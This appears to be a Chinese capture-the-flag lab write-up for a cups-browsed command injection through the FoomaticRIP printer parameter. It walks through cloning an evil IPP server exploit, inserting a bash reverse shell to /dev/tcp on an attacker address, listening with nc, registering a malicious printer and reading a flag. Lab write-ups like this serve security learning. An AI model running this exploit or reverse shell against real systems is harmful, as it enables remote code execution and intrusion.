!quote(https://discussions.apple.com/thread/255781685?sortBy=rank)
该漏洞本质是 cups-browsed 服务的命令注入漏洞,触发流程可分为 3 个关键步骤:
FoomaticRIP
参数(用于指定打印机的渲染工具路径),且未对该参数进行任何过滤。FoomaticRIP
参数(例如拼接反弹 Shell 命令)。FoomaticRIP
参数初始化打印机时,会直接通过系统 Shell 执行参数中的恶意命令,最终导致远程代码执行(RCE) 。靶场环境
!note 靶场环境# 虚拟机 10.132.1.111靶机10.22.194.121 参考文章:https://zhuanlan.zhihu.com/p/1920493092273886806
克隆Github的EXP
git clone https://github.com/vulhub/evil-ipp-server
修改poc.py
:
/bin/bash -i >& /dev/tcp/10.132.1.111/12346 0>&1
启动nc监听
┌──(kali㉿kali)-[~/Tools/evil-ipp-server]
└─$ nc -lvnp 12346
Listening on 0.0.0.0 12346
新增一个恶意打印机
┌──(kali㉿kali)-[~/Tools/evil-ipp-server]
└─$ python poc.py 10.132.1.111 10.22.194.121
malicious ipp server listening on ('10.132.1.111', 12345)
sending udp packet to 10.22.194.121:631 ...
访问靶机的631端口的打印机列表,可以看到之前通过运行poc.py
注册的打印机:http://10.22.194.121:631/printers/
。
运行后,nc成功接收到反弹shell,成功拿到Flag。
flag.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
lp@cci-72b6c7cd-c747-418b-9b13-607cdac58fb1-d9d665b68-nhx8m:/$ cat flag.txt
cat flag.txt
NextCyber{6CjIgejv-1Sfjrx}
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。